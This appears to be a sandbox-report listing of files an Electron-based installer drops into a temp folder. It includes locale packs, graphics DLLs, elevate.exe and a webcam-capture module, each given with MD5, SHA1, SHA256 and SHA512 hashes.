SHA512 1de07f9f80d3c177f99f2743d8740b5a2d2d2ea39184674a4f67e275d72fa4d402e2df551fd3b354b4fa2d16700c4ab13edfede69d1c30d19e7094096e53260d

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\vk_swiftshader.dll

MD5 1513c49f0cab529ae5b78ea46dbe3359
SHA1 4eebd2f580100dd2daa543e98edd7787d3255410
SHA256 77e5d2cffde02c6daa0f604b789cf969c8914640c5c7722b5cf5bd4946dd363b
SHA512 ed000233c17382ec24365fc6619ae9c419d6a46bc1b6025c707dac0a2b6b0122e6abf3c8f2f988771e4f6d29c844fae22d914df58ff7b6f6ed6758a11de0a9e8

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\vulkan-1.dll

MD5 85b98ad3e480cca08e8466fa5fdcce63
SHA1 de1906955f50530749f9a6d6359449025eda9b9e
SHA256 a1a1ed1e647466a19a7fb84892d5849db3917a7db61fa65015b567be1ad92639
SHA512 9df3af0b995f490882e5abb63cb304c184fa32e465b96f7863c40b2d9d8bdc4cd263fbf5c7aa839d77724841a3e9e5de4587244c0427a9bd5f6577a1631dac3d

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\hi.pak

MD5 05d4f18712d1eb9821e48b8506cafd16
SHA1 82bd7dd41446288a567bb3f507ff1239322f6968
SHA256 6f274b564a89fb26f74c7a4e26ac6a321835f5f2c8e9310dd9ecb0215b855dbf
SHA512 a5ca30dff18d9f12b3ea623755fe87f78236d9f1bb6102f680fa6b08268fcf3b77bd8f7ffa797565b252388380d1e8b5031b8f536c411b8bdc847a0a5549f44f

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\gu.pak

MD5 58e512b0d5fe360421093f2245221205
SHA1 6e1beb0f4f4e661853597b213db272af6670689f
SHA256 a1203be1c72c87dff8e7b96f5d1bfb89d5ac16a6420ef668df8927383e975cb6
SHA512 70d8cf4e98b9387df81b9ea06f3520eed74f83249233caeac8a8ae8b7103da4a1311cacf7d6ed243517f1886eb50763fc5f4e301e7e29e4d353576c761d03d63

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\mr.pak

MD5 5cd3bee38c99eb0cc929de7cb219ca7e
SHA1 7ff5fc0cddce0c839f071a4a221697de89de7a18
SHA256 2fc2976a88656481fb328c00699dcaff74d0e0ddae2b783b5cd523951dee79b5
SHA512 348ad4deb461fb8e7056a6d7bad05f4dff0e89ad4152673358d02a4011256b4f2823df280c9ce0c23e0c12e353bf5fe2a04caee12fedb9d8760d03aa8781ab7f

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ml.pak

MD5 d323a61477d6a737f8fcc986d9fd78e9
SHA1 0d48af1d74b7cad061ff442badd3929b20f54179
SHA256 b79d9e4478c0a333ab4cb21b5e90d1d63d64adc70df6e924a97e7909e00b99f6
SHA512 7e8e88a4698ff6d7d4457650a0243b511ab6175e93a5f60bf804918f805b11a54c8fb0373f177d69b729931eeb5221e6038f0fb734d1acabe6342da1d421d5f0

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\kn.pak

MD5 cf0ba0729f87939926a6addebca2770d
SHA1 537367a55cb8ade89f9639834b2840a830e92d90
SHA256 4aad199caebabd245d6ef3004819342606cbc19e1fc24bee52b6d24082af531c
SHA512 36454882acd362288e3bddcc0079fdcfaccba97cc776c8b12206c01787d1714f8cbd9cf2b92d0952ee4feaecf4fed22c76417792099e2720edd7939bf1e4c4f1

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\pl.pak

MD5 72f10f25ec6614db6b22526ba2981370
SHA1 439d41ba1c561177dca16cf7b0691ae4fec38eeb
SHA256 a2c9347e481c6f486144e24eee678482922b6678540be2c9c809946f72d0449b
SHA512 b8cc6e8a96db074e60e38059a0afe03a9940108d2b04d7ae14ab60f5be3a1bbd2fd4a50e97f5114ae444f434cfd6e600c9f0637a72dde4979ae696d17b4ad509

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\sr.pak

MD5 a4ad50a7f0d47e3681e12d510e1f2505
SHA1 efdae26dac970c9b7307b9873fb97af0dc380e3e
SHA256 07a47946fa31a1a79b6da185b1f190a4bc6e16ab7c0dee6b2198d3eb6bd4a102
SHA512 bdd9a803cc1eb11f258eaf70c7c936c3f529e208107f292f265514d0916678ef11c1a3a16160853b9c9332a191a5d7aeb0589bb796d4e8c9a08df8e946b34e01

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\th.pak

MD5 33dddbad24dcb031bc4a6c8b48b6a235
SHA1 02276784fc4a83c789dcd2ae9e47bf209cb58bb2
SHA256 abb06d44a58563b26d8fe7723b5688ca22c4114f2220ac062e3d5234357ba1de
SHA512 ccddf2d9370da98434199159f833d484871d54dffd019033a99401bd7ef6669faddcd5fc3fbeb11b432f3930512d604f45787812742bbb1ae1a6dcd59cb64d14

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 2d8ce30fcfab5040bf1c9fc949f2656d
SHA1 467fc87a13feb4ba929406221c67a749e16ca2dd
SHA256 eb9e4f2deb0f92e7318f51c1588bba12a1aca41da91177d611f6661aba3959c1
SHA512 b00064f5169a50f822ebed5009ad223657773c2223ba42b47f91f2ae522a67ea9db4346fef102a79df2cb81eb688d53131b7a77ffc40733e5d0269576dd0a2fe

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources\app.asar

MD5 bc62c50567a95f98990e7df316295dbf
SHA1 b14881136bb78c1f1fc0ea1095452b9c91c147b6
SHA256 3cec50f4bc91dd28bd08007ea83d08dbc204fa65a244af70bff0ee98234c682b
SHA512 915214620d57c45437892acd7a9d445ef09b4f258b70b737163508272fc48bbf26696948a7c5a9a01d2d2ccfdf69d020c73e4d3003857c8c6922ec2b8e9e37b0

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
